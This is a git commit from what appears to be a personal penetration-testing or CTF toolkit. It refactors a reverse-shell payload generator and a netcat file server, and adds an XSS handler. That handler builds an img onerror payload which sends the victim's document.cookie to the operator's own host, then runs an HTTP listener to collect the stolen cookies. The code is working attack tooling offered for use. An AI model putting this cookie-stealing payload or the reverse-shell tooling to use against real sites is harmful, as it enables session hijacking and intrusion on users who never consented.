Browse Source

xss + utils

Roman Hergenreder 3 years ago
parent
commit
712b851f36
5 changed files with 107 additions and 29 deletions
  1. 1 0
      .gitignore
  2. 14 14
      genRevShell.py
  3. 10 15
      upload_file.py
  4. 37 0
      util.py
  5. 45 0
      xss_handler.py

+ 1 - 0
.gitignore

@@ -0,0 +1 @@
+__pycache__

+ 14 - 14
genRevShell.py

@@ -3,16 +3,7 @@
 import socket
 import sys
 import subprocess
-import netifaces as ni
-
-def getLocalAddress():
-    interface = "tun0"
-    if not interface in ni.interfaces():
-        interface = ni.interfaces()[0]
-
-    addresses = ni.ifaddresses(interface)
-    address = addresses[next(iter(addresses))][0]["addr"]
-    return address
+import util
 
 def generatePayload(type, local_address, port):
 
@@ -38,14 +29,23 @@ def generatePayload(type, local_address, port):
 
 if __name__ == "__main__":
 
-    if len(sys.argv) < 3:
-        print("Usage: %s <type> <port>" % sys.argv[0])
+    if len(sys.argv) < 2:
+        print("Usage: %s <type> [port]" % sys.argv[0])
         exit(1)
 
-    listen_port = int(sys.argv[2])
+    listen_port = None if len(sys.argv) < 3 else int(sys.argv[2])
     payload_type = sys.argv[1].lower()
 
-    local_address = getLocalAddress()
+    local_address = util.getAddress()
+
+    # choose random port
+    if listen_port is None:
+        sock = util.openServer(local_address)
+        if not sock:
+            exit(1)
+        listen_port = sock.getsockname()[1]
+        sock.close()
+
     payload = generatePayload(payload_type, local_address, listen_port)
 
     if payload is None:

+ 10 - 15
upload_file.py

@@ -1,7 +1,8 @@
-import socket
+#!/usr/bin/python
+
 import sys
 import os
-import netifaces as ni
+import util
 
 if len(sys.argv) < 2:
     print("Usage: %s <file> [port]" % sys.argv[0])
@@ -9,22 +10,16 @@ if len(sys.argv) < 2:
 
 # Create a TCP/IP socket
 FILENAME = sys.argv[1]
-sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
-
-interface = "tun0"
-if not interface in ni.interfaces():
-    interface = ni.interfaces()[0]
 
-addresses = ni.ifaddresses(interface)
-address = addresses[next(iter(addresses))][0]["addr"]
+# Bind the socket to the port or choose a random one
+address = util.getAddress()
+port = None if len(sys.argv) < 3 else int(sys.argv[2])
+sock = util.openServer(address, port)
+if not sock:
+    exit(1)
 
-# Bind the socket to the port
-port = 8888 if len(sys.argv) < 3 else int(sys.argv[2])
-server_address = (address, port)
-sock.bind(server_address)
-sock.listen(1)
 print("Now listening, download file using:")
-print('nc %s %d > %s' % (address, port, os.path.basename(FILENAME)))
+print('nc %s %d > %s' % (address, sock.getsockname()[1], os.path.basename(FILENAME)))
 print()
 
 while True:

+ 37 - 0
util.py

@@ -0,0 +1,37 @@
+import random
+import socket
+import netifaces as ni
+
+def getAddress(interface="tun0"):
+    if not interface in ni.interfaces():
+        interfaces = ni.interfaces()
+        interfaces.remove('lo')
+        interface = interfaces[0]
+
+    addresses = ni.ifaddresses(interface)
+    address = addresses[ni.AF_INET][0]["addr"]
+    return address
+
+def openServer(address, ports=None):
+    listenPort = None
+    retry = True
+    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+
+    while retry:
+
+        if isinstance(ports, int):
+            listenPort = ports
+            retry = False
+        elif isinstance(ports, range):
+            listenPort = random.randint(ports[0],ports[-1])
+        elif ports is None:
+            listenPort = random.randint(10000,65535)
+
+        try:
+            sock.bind((address, listenPort))
+            sock.listen(1)
+            return sock
+        except Exception as e:
+            if not retry:
+                print("Unable to listen on port %d: %s" % (listenPort, str(e)))
+            raise e

+ 45 - 0
xss_handler.py

@@ -0,0 +1,45 @@
+#!/usr/bin/env python
+
+import util
+import sys
+import http.server
+import socketserver
+
+def generatePayload(type, address, port):
+    if type == "img":
+        return '<img src="#" onerror="javascript:document.location=\'http://%s:%d/?x=\'+document.cookie">' % (address, port)
+    else:
+        return None
+
+if __name__ == "__main__":
+
+    if len(sys.argv) < 2:
+        print("Usage: %s <type> [port]" % sys.argv[0])
+        exit(1)
+
+    listen_port = None if len(sys.argv) < 3 else int(sys.argv[2])
+    payload_type = sys.argv[1].lower()
+
+    local_address = util.getAddress()
+
+    # choose random port
+    if listen_port is None:
+        sock = util.openServer(local_address)
+        if not sock:
+            exit(1)
+        listen_port = sock.getsockname()[1]
+        sock.close()
+
+    payload = generatePayload(payload_type, local_address, listen_port)
+    if not payload:
+        print("Unsupported payload type, choose one of: img")
+        exit(1)
+
+    print("Payload:")
+    print(payload)
+    print()
+
+    Handler = http.server.SimpleHTTPRequestHandler
+    with socketserver.TCPServer((local_address, listen_port), Handler) as httpd:
+        print("serving at port", listen_port)
+        httpd.serve_forever()